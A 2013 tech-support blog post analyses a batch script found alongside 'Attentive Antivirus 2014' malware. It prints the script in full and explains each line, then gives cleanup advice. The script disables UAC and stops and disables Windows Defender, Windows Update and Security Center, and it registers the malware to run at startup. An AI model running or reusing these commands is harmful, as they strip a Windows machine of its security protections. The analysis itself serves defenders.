• Home
  • About 404TS
  • Contact

404 Tech Support

Where IT Help is Found

  • Articles
    • Code
    • Entertainment
    • Going Green
    • Hardware, Gadgets, and Products
    • Management
    • Network
    • News
    • Operating Systems
    • Security and Privacy
    • Software
    • System Administration
    • Talking Points
    • Tech Solutions
    • Web
    • Webmaster
  • Reviews
  • Media
    • Infographics
    • Videos
  • Tech Events
  • Tools
    • How do I find my IP address?
    • Browser and plugin tests
  • Get a Technical Consultation
You are here: Home / Articles / Security and Privacy / Analyzing malware Attentive Antivirus files

Analyzing malware Attentive Antivirus files

2013-08-08 by Jason

Earlier this week, a computer was flagged by our security software as still infected. The malware was residing in C:ProgramDataaUs6sdpV with an executable of the same name as the folder. Symantec identified it as Suspicious.Cloud.5.A while others flagged it as AA2014 or Attentive Antivirus 2014 malware. More interesting than the executable itself which ComboFix was able to cleanup, a batch script was in the same directory as part of the malware. I copied it here in order to do a little analysis and learn from it.

Fortunately, it is a pretty straight-forward script but I find it interesting to see what malware authors seek to do.

[bash]
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v MSASCui /f
reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Windows Defender" /f
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v AA2014 /t REG_SZ /d C:ProgramDataaUs6sdpVaUs6sdpV.exe[/bash]

Lines 1 -3 create registry keys where group policies are stored.

Lines 4-7 stop the Windows Defender, the Microsoft Anti-Malware, the Windows Update Service, and the Windows Security Center services, respectively.

Line 8 uses ping as a make-shift “sleep” functionality to ensure the services are stopped.

Lines 9-13 disable those same services in addition to luafv, a file system driver component that is apart of UAC.

Line 14 is another make-shift “sleep” through ping.

Lines 15 and 16 deletes Windows Defender from the Registry run key which starts the application up.

Line 17 adds the malware executable to the same location so it is launched with each start of Windows.

Conclusions

The tasks of this batch scrip makes it easy to reverse-engineer. While an anti-malware tool might remove only the malicious executable, these other files may still remain along with the changes to the registry. Clean up from the malware should consist of making sure the disabled services are configured back to their automatic or manual startup states and running. Windows Defender should be re-added to the Run key if it is used and to prevent errors, the malicious executable should be deleted from the HKLM Run key.

Because there can be so much going on after a malware infection, re-installing Windows is the most comprehensive way to ensure that the system is clean and back to its original configuration. A good series to read on the topic:

  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+2/15406
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+3/15448
  • https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+4/15460

“Some people are of the opinion that people who “wipe the drive” when they are infected with malware lack the technical expertise and knowledge that is required to remove the malware. I’d argue that the opposite is true. It is the difference between unconscious incompetence and conscious incompetence. There, I said it. I am incompetent when it comes to finding everywhere malware could have hidden on a machine. Given enough time and energy I MIGHT find it all, but is that good enough? If that isn’t good enough then do as I do and just wipe the drive.”

Filed Under: Security and Privacy

Trending

  • Microsoft and AARP offer booklet to protect would-be victims from tech support scams
    In Security and Privacy
  • Cry Baby Android [comic]
    In Entertainment, Hardware, Gadgets, and Products, Software
  • Doing More With Less: Links and Shortcuts
    In Media, Software, Tech Solutions

Latest Media Posts

Find Out Where To Download SNES ROMs

Find Out Where To Download SNES ROMs

Multifunctional Video Conversion Tools – Wondershare Video Converter

Multifunctional Video Conversion Tools – Wondershare Video Converter

  • Popular
  • Latest
  • Today Week Month All
  • How to ‘Unblock’ multiple files at a time with PowerShell How to 'Unblock' multiple files at a time with PowerShell
  • Read the Event Logs on Windows Server Core Read the Event Logs on Windows Server Core
  • SOLVED: “This modification is not allowed because the selection is locked.” SOLVED: "This modification is not allowed because the selection is locked."
  • Increase IIS Private Memory Limit to improve WSUS availability Increase IIS Private Memory Limit to improve WSUS availability
  • Access to the resource [servershare] has been disallowed Access to the resource [servershare] has been disallowed
  • Keeping Your Mac Healthy: A Comprehensive Guide to Maintenance and Troubleshooting Keeping Your Mac Healthy: A Comprehensive Guide to Maintenance and Troubleshooting
  • Making Distributed Software Development Work: Strategies and Best Practices for Managing Remote Teams Making Distributed Software Development Work: Strategies and Best Practices for Managing Remote Teams
  • customer contactless payment for drink with mobile phon at cafe counter bar,seller coffee shop accept payment by mobile.new normal lifestyle concept The Latest Innovations In Payment Technology
  • How Digital Technology Brought the Rise of the CMO   How Digital Technology Brought the Rise of the CMO  
  • How to Purchase Cryptocurrencies? How to Purchase Cryptocurrencies?
Ajax spinner

Elevator Pitch

404 Tech Support documents solutions to IT problems, shares worthwhile software and websites, and reviews hardware, consumer electronics, and technology-related books.

Subscribe to 404TS articles by email.

Recent Posts

  • Keeping Your Mac Healthy: A Comprehensive Guide to Maintenance and Troubleshooting
  • Making Distributed Software Development Work: Strategies and Best Practices for Managing Remote Teams
  • The Latest Innovations In Payment Technology

Search

FTC Disclaimer

404TechSupport is an Amazon.com affiliate; when you click on an Amazon link from 404TS, the site gets a cut of the proceeds from whatever you buy. This site also uses Skimlinks for smart monetization of other affiliate links.
Use of this site requires displaying and viewing ads as they are presented.

Copyright © 2023 · Magazine Pro Theme on Genesis Framework · WordPress · Log in